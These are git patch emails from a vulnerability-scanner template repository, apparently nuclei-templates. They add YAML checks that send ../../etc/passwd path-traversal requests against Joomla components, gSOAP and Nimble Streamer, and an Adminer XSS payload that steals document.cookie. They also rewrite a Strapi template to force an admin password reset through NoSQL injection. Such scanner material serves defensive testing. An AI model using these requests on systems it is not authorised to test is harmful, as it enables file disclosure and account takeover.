| | | | +| tjws | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| kong | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| db | 1 | | | | | | | | | +| processmaker | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| elascticsearch | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| netsweeper | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| tracer | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| cve2006 | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| xff | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| owa | 1 | | | | | | | | | +| asus | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| eyelock | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| oneblog | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| acontent | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| rfi | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| couchbase | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| manageengine | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| commax | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| resourcespace | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| druid | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| wondercms | 1 | | | | | | | | | +| payara | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| getsimple | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| cves2016 | 1 | | | | | | | | | +| mailchimp | 1 | | | | | | | | | +| netmask | 1 | | | | | | | | | +| harbor | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| azkaban | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| adminer | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| gotmls | 1 | | | | | | | | | +| wuzhicms | 1 | | | | | | | | | +| graphite | 1 | | | | | | | | | +| ghost | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| aruba | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| tieline | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| liferay | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| pcoip | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| ilo | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| adb | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| craftcms | 1 | | | | | | | | | +| bigbluebutton | 1 | | | | | | | | | +| whm | 1 | | | | | | | | | +| meraki | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| logontracer | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| bruteforce | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| netgenie | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 69f64f98aa..869329e073 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 649 | dhiyaneshdk | 245 | cves | 657 | info | 610 | http | 1833 | -| panel | 236 | pikpikcu | 244 | vulnerabilities | 284 | high | 526 | file | 46 | -| xss | 224 | pdteam | 198 | exposed-panels | 235 | medium | 406 | network | 39 | -| lfi | 221 | daffainfo | 176 | exposures | 185 | critical | 232 | dns | 11 | -| exposure | 217 | geeknik | 149 | technologies | 164 | low | 160 | | | -| wordpress | 205 | dwisiswant0 | 132 | misconfiguration | 125 | | | | | -| rce | 190 | gy741 | 72 | takeovers | 71 | | | | | -| cve2020 | 157 | madrobot | 62 | default-logins | 52 | | | | | -| wp-plugin | 138 | princechaddha | 54 | file | 46 | | | | | -| tech | 106 | pussycat0x | 48 | workflows | 35 | | | | | +| cve | 666 | dhiyaneshdk | 248 | cves | 674 | info | 615 | http | 1859 | +| panel | 236 | pikpikcu | 246 | vulnerabilities | 284 | high | 535 | file | 46 | +| lfi | 228 | pdteam | 198 | exposed-panels | 235 | medium | 413 | network | 39 | +| xss | 225 | daffainfo | 183 | exposures | 186 | critical | 236 | dns | 11 | +| exposure | 221 | geeknik | 150 | technologies | 170 | low | 161 | | | +| wordpress | 206 | dwisiswant0 | 132 | misconfiguration | 129 | | | | | +| rce | 193 | gy741 | 72 | takeovers | 71 | | | | | +| cve2020 | 159 | madrobot | 62 | default-logins | 54 | | | | | +| wp-plugin | 139 | princechaddha | 55 | file | 46 | | | | | +| cve2021 | 112 | pussycat0x | 55 | workflows | 35 | | | | | From 4c0691f09fc4881cacd23ff2324b2c8288c5b47c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 4 Sep 2021 11:19:04 +0000 Subject: [PATCH 2032/4083] Auto Update README [Sat Sep 4 11:19:04 UTC 2021] :robot: --- README.md | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/README.md b/README.md index a447037293..5487e31afc 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 649 | dhiyaneshdk | 245 | cves | 657 | info | 610 | http | 1833 | -| panel | 236 | pikpikcu | 244 | vulnerabilities | 284 | high | 526 | file | 46 | -| xss | 224 | pdteam | 198 | exposed-panels | 235 | medium | 406 | network | 39 | -| lfi | 221 | daffainfo | 176 | exposures | 185 | critical | 232 | dns | 11 | -| exposure | 217 | geeknik | 149 | technologies | 164 | low | 160 | | | -| wordpress | 205 | dwisiswant0 | 132 | misconfiguration | 125 | | | | | -| rce | 190 | gy741 | 72 | takeovers | 71 | | | | | -| cve2020 | 157 | madrobot | 62 | default-logins | 52 | | | | | -| wp-plugin | 138 | princechaddha | 54 | file | 46 | | | | | -| tech | 106 | pussycat0x | 48 | workflows | 35 | | | | | +| cve | 666 | dhiyaneshdk | 248 | cves | 674 | info | 615 | http | 1859 | +| panel | 236 | pikpikcu | 246 | vulnerabilities | 284 | high | 535 | file | 46 | +| lfi | 228 | pdteam | 198 | exposed-panels | 235 | medium | 413 | network | 39 | +| xss | 225 | daffainfo | 183 | exposures | 186 | critical | 236 | dns | 11 | +| exposure | 221 | geeknik | 150 | technologies | 170 | low | 161 | | | +| wordpress | 206 | dwisiswant0 | 132 | misconfiguration | 129 | | | | | +| rce | 193 | gy741 | 72 | takeovers | 71 | | | | | +| cve2020 | 159 | madrobot | 62 | default-logins | 54 | | | | | +| wp-plugin | 139 | princechaddha | 55 | file | 46 | | | | | +| cve2021 | 112 | pussycat0x | 55 | workflows | 35 | | | | | -**147 directories, 1989 files**. +**150 directories, 2015 files**. </td> </tr> From b0900aacdb9bf2445254dd26b9024f26f57b5dbc Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Sat, 4 Sep 2021 14:29:07 -0500 Subject: [PATCH 2033/4083] Create ibm-security-access-manager.yaml --- .../ibm-security-access-manager.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 exposed-panels/ibm-security-access-manager.yaml diff --git a/exposed-panels/ibm-security-access-manager.yaml b/exposed-panels/ibm-security-access-manager.yaml new file mode 100644 index 0000000000..91e521e81c --- /dev/null +++ b/exposed-panels/ibm-security-access-manager.yaml @@ -0,0 +1,29 @@ +id: ibm-security-access-manager + +info: + name: Detects IBM Security Access Manager + description: IBM Security Access Manager is a complete authorization and network security policy management solution. It provides end-to-end protection of resources over geographically dispersed intranets and extranets. + reference: https://www.ibm.com/docs/en/sva/9.0.7?topic=overview-introduction-security-access-manager + author: geeknik + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "<title>IBM Security Access Manager" + - "<h2>IBM Security" + - "<em>Access Manager" + condition: and + - type: word + part: header + words: + - "text/html" From ef9055b4f0169cab9875941759475668361e7d5d Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 5 Sep 2021 08:55:43 +0700 Subject: [PATCH 2034/4083] Create CVE-2010-1312.yaml --- cves/2010/CVE-2010-1312.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1312.yaml diff --git a/cves/2010/CVE-2010-1312.yaml b/cves/2010/CVE-2010-1312.yaml new file mode 100644 index 0000000000..022a54afd8 --- /dev/null +++ b/cves/2010/CVE-2010-1312.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1312 + +info: + name: Joomla! Component News Portal 1.5.x - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12077 + - https://www.cvedetails.com/cve/CVE-2010-1312 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 06fba0c78d6f7da0a34e3891b54cb42758d629e0 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 5 Sep 2021 09:03:48 +0700 Subject: [PATCH 2035/4083] Create CVE-2010-1473.yaml --- cves/2010/CVE-2010-1473.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1473.yaml diff --git a/cves/2010/CVE-2010-1473.yaml b/cves/2010/CVE-2010-1473.yaml new file mode 100644 index 0000000000..c2e7878067 --- /dev/null +++ b/cves/2010/CVE-2010-1473.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1473 + +info: + name: Joomla! Component Advertising 0.25 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12171 + - https://www.cvedetails.com/cve/CVE-2010-1473 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From e96b94242fa75b1eb76d49f0f4a77b097db6b747 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Sun, 5 Sep 2021 12:07:47 +0900 Subject: [PATCH 2036/4083] Create gSOAP-LFl.yaml --- gSOAP-LFl.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 gSOAP-LFl.yaml diff --git a/gSOAP-LFl.yaml b/gSOAP-LFl.yaml new file mode 100644 index 0000000000..f7bd7c67e7 --- /dev/null +++ b/gSOAP-LFl.yaml @@ -0,0 +1,24 @@ +id: gsoap-lfi + +info: + name: gSOAP 2.8 - Directory Traversal + author: 0x_Akoko + severity: high + reference: https://www.exploit-db.com/exploits/47653 + tags: gsoap,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From f8e19ea1d258d60a5d4889e8afcb619801daf8e3 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Sun, 5 Sep 2021 12:10:02 +0900 Subject: [PATCH 2037/4083] Create CVE-2019-11013.yaml --- CVE-2019-11013.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 CVE-2019-11013.yaml diff --git a/CVE-2019-11013.yaml b/CVE-2019-11013.yaml new file mode 100644 index 0000000000..680aabcde6 --- /dev/null +++ b/CVE-2019-11013.yaml @@ -0,0 +1,24 @@ +id: CVE-2019-11013 + +info: + name: Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal + author: 0x_Akoko + severity: high + reference: https://www.exploit-db.com/exploits/47301 + tags: cves,lfi,nimble + +requests: + - method: GET + path: + - "{{BaseURL}}/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 062487f9e8288b80e8420acf0c5518e0bf8633d6 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 5 Sep 2021 17:12:40 +0700 Subject: [PATCH 2038/4083] Create CVE-2021-29625.yaml --- cves/2021/CVE-2021-29625.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2021/CVE-2021-29625.yaml diff --git a/cves/2021/CVE-2021-29625.yaml b/cves/2021/CVE-2021-29625.yaml new file mode 100644 index 0000000000..65318224ba --- /dev/null +++ b/cves/2021/CVE-2021-29625.yaml @@ -0,0 +1,32 @@ +id: CVE-2021-29625 + +info: + name: Adminer reflected XSS via the table parameter + author: daffainfo + description: Adminer is open-source database management software. A cross-site scripting vulnerability in Adminer versions 4.6.1 to 4.8.0 affects users of MySQL, MariaDB, PgSQL and SQLite. XSS is in most cases prevented by strict CSP in all modern browsers. The only exception is when Adminer is using a `pdo_` extension to communicate with the database (it is used if the native extensions are not enabled). In browsers without CSP, Adminer versions 4.6.1 to 4.8.0 are affected. The vulnerability is patched in version 4.8.1. As workarounds, one can use a browser supporting strict CSP or enable the native PHP extensions (e.g. `mysqli`) or disable displaying PHP errors (`display_errors`). + severity: medium + reference: + - https://sourceforge.net/p/adminer/bugs-and-features/797/ + - https://www.cvedetails.com/cve/CVE-2021-29625/ + tags: cve,cve2021,adminer,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/?server=db&username=root&db=mysql&table=event%27%3E%3Csvg/onload=alert(document.cookie)%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "'><svg/onload=alert(document.cookie)>" + part: body + + - type: word + words: + - "text/html" + part: header + + - type: status + status: + - 200 From 17d55f7a17cac495969d4e9c6350364b06d6aec3 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sun, 5 Sep 2021 15:51:47 +0530 Subject: [PATCH 2039/4083] misc update --- cves/2019/CVE-2019-18818.yaml | 29 +++++++++++++++++++---------- 1 file changed, 19 insertions(+), 10 deletions(-) diff --git a/cves/2019/CVE-2019-18818.yaml b/cves/2019/CVE-2019-18818.yaml index 01fceb5e82..bd28bef61f 100644 --- a/cves/2019/CVE-2019-18818.yaml +++ b/cves/2019/CVE-2019-18818.yaml @@ -1,19 +1,25 @@ id: CVE-2019-18818 info: - name: Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated) + name: Strapi CMS - Admin password reset (Unauthenticated) author: idealphase description: strapi before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js. reference: + - https://github.com/advisories/GHSA-6xc2-mj39-q599 - https://www.exploit-db.com/exploits/50239 - https://nvd.nist.gov/vuln/detail/CVE-2019-18818 severity: critical - tags: cve,cve2019,strapi,rce + tags: cve,cve2019,strapi,auth-bypass,intrusive requests: - - method: GET - path: - - "{{BaseURL}}/admin/strapiVersion" + - raw: + - | + POST /admin/auth/reset-password HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/json + + {"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"} matchers-condition: and matchers: @@ -28,10 +34,13 @@ requests: - type: word words: - - "strapiVersion" + - '"username":' + - '"email":' + - '"jwt":' part: body - - type: word - words: - - '3.0.0-beta.17.4' - part: body + extractors: + - type: json + json: + - .user.username + - .user.email \ No newline at end of file From 7696f9ab3b0ad33fa4c84da4e77a380b00463a77 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sun, 5 Sep 2021 17:23:34 +0530 Subject: [PATCH 2040/4083] Added login panel detection --- strapi-panel.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 strapi-panel.yaml diff --git a/strapi-panel.yaml b/strapi-panel.yaml new file mode 100644 index 0000000000..ff373e8e4f --- /dev/null +++ b/strapi-panel.yaml @@ -0,0 +1,23 @@ +id: strapi-panel + +info: + name: Strapi Login Panel + author: idealphase + severity: info + tags: panel,strapi + +requests: + - method: GET + path: + - '{{BaseURL}}/admin/auth/login' + + matchers-condition: and + matchers: + + - type: word + words: + - "<title>Strapi Admin" + + - type: status + status: + - 200 \ No newline at end of file From 91a059cde71cbbb98b6e822a1f625c79c1c0ce93 Mon Sep 17 00:00:00 2001 From: kali Date: Sun, 5 Sep 2021 08:42:45 -0400 Subject: [PATCH 2041/4083] Updated via change location of strapi-panel.yaml to proper directory --- strapi-panel.yaml => exposed-panels/strapi-panel.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename strapi-panel.yaml => exposed-panels/strapi-panel.yaml (100%) diff --git a/strapi-panel.yaml b/exposed-panels/strapi-panel.yaml similarity index 100% rename from strapi-panel.yaml rename to exposed-panels/strapi-panel.yaml From bf1d6374b23b379c17efd5034430b888464d46da Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 5 Sep 2021 19:22:07 +0530 Subject: [PATCH 2042/4083] Rename gSOAP-LFl.yaml to vulnerabilities/other/gsoap-lfi.yaml --- gSOAP-LFl.yaml => vulnerabilities/other/gsoap-lfi.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename gSOAP-LFl.yaml => vulnerabilities/other/gsoap-lfi.yaml (100%) diff --git a/gSOAP-LFl.yaml b/vulnerabilities/other/gsoap-lfi.yaml similarity index 100% rename from gSOAP-LFl.yaml rename to vulnerabilities/other/gsoap-lfi.yaml From d3a88548e5e368916e57a7e46a708a32206e96cd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 5 Sep 2021 19:23:17 +0530 Subject: [PATCH 2043/4083] Update and rename CVE-2019-11013.yaml to cves/2019/CVE-2019-11013.yaml --- CVE-2019-11013.yaml => cves/2019/CVE-2019-11013.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename CVE-2019-11013.yaml => cves/2019/CVE-2019-11013.yaml (94%) diff --git a/CVE-2019-11013.yaml b/cves/2019/CVE-2019-11013.yaml similarity index 94% rename from CVE-2019-11013.yaml rename to cves/2019/CVE-2019-11013.yaml index 680aabcde6..ba86250503 100644 --- a/CVE-2019-11013.yaml +++ b/cves/2019/CVE-2019-11013.yaml @@ -5,7 +5,7 @@ info: author: 0x_Akoko severity: high reference: https://www.exploit-db.com/exploits/47301 - tags: cves,lfi,nimble + tags: cve,cve2019,lfi,nimble requests: - method: GET From 63ce5e0b7780513aaa76f238955b4bc27751a2fd Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 5 Sep 2021 22:52:45 +0530 Subject: [PATCH 2044/4083] Nextcloud templates --- misconfiguration/nextcloud-install.yaml | 28 +++++++++++++++++++++++++ technologies/nextcloud-detect.yaml | 24 +++++++++++++++++++++ 2 files changed, 52 insertions(+) create mode 100644 misconfiguration/nextcloud-install.yaml create mode 100644 technologies/nextcloud-detect.yaml diff --git a/misconfiguration/nextcloud-install.yaml b/misconfiguration/nextcloud-install.yaml new file mode 100644 index 0000000000..a2a87e7bf0 --- /dev/null +++ b/misconfiguration/nextcloud-install.yaml @@ -0,0 +1,28 @@ +id: nextcloud-install + +info: + name: Nextcloud Exposed Installation + author: skeltavik + severity: high + tags: tech,nextcloud,storage + reference: https://docs.nextcloud.com/server/latest/admin_manual/installation/installation_wizard.html + +requests: + - method: GET + path: + - '{{BaseURL}}' + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - '
    Create an admin account' + - 'Storage & database' + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/technologies/nextcloud-detect.yaml b/technologies/nextcloud-detect.yaml new file mode 100644 index 0000000000..9039bfb4a2 --- /dev/null +++ b/technologies/nextcloud-detect.yaml @@ -0,0 +1,24 @@ +id: nextcloud-detect + +info: + name: Nextcloud Detect + author: skeltavik + severity: info + description: Detects Nextcloud + tags: tech,nextcloud,storage + reference: https://nextcloud.com + +requests: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/nextcloud/index.php/login' + - '{{BaseURL}}/login' + + redirects: true + max-redirects: 2 + matchers: + - type: word + part: body + words: + - 'var nc_lastLogin' From 513f9058f306f498ef4a3c0a3a445860f315a97e Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 5 Sep 2021 22:56:47 +0530 Subject: [PATCH 2045/4083] misc update Co-Authored-By: Bram Ruttens <3391681+skeltavik@users.noreply.github.com> --- technologies/nextcloud-detect.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/technologies/nextcloud-detect.yaml b/technologies/nextcloud-detect.yaml index 9039bfb4a2..b46697fb61 100644 --- a/technologies/nextcloud-detect.yaml +++ b/technologies/nextcloud-detect.yaml @@ -12,9 +12,10 @@ requests: - method: GET path: - '{{BaseURL}}' - - '{{BaseURL}}/nextcloud/index.php/login' - '{{BaseURL}}/login' + - '{{BaseURL}}/nextcloud/index.php/login' + stop-at-first-match: true redirects: true max-redirects: 2 matchers: From ef1f7c5e92133362f6e59b96c491cc95ad0993d1 Mon Sep 17 00:00:00 2001 From: sullo Date: Sun, 5 Sep 2021 17:13:45 -0400 Subject: [PATCH 2046/4083] Updates across many templates for clarity, spelling, and grammar. --- cves/2009/CVE-2009-1151.yaml | 4 ++-- cves/2009/CVE-2009-4223.yaml | 2 +- cves/2013/CVE-2013-2251.yaml | 2 +- cves/2016/CVE-2016-5649.yaml | 4 ++-- cves/2017/CVE-2017-15715.yaml | 4 ++-- cves/2017/CVE-2017-18638.yaml | 2 +- 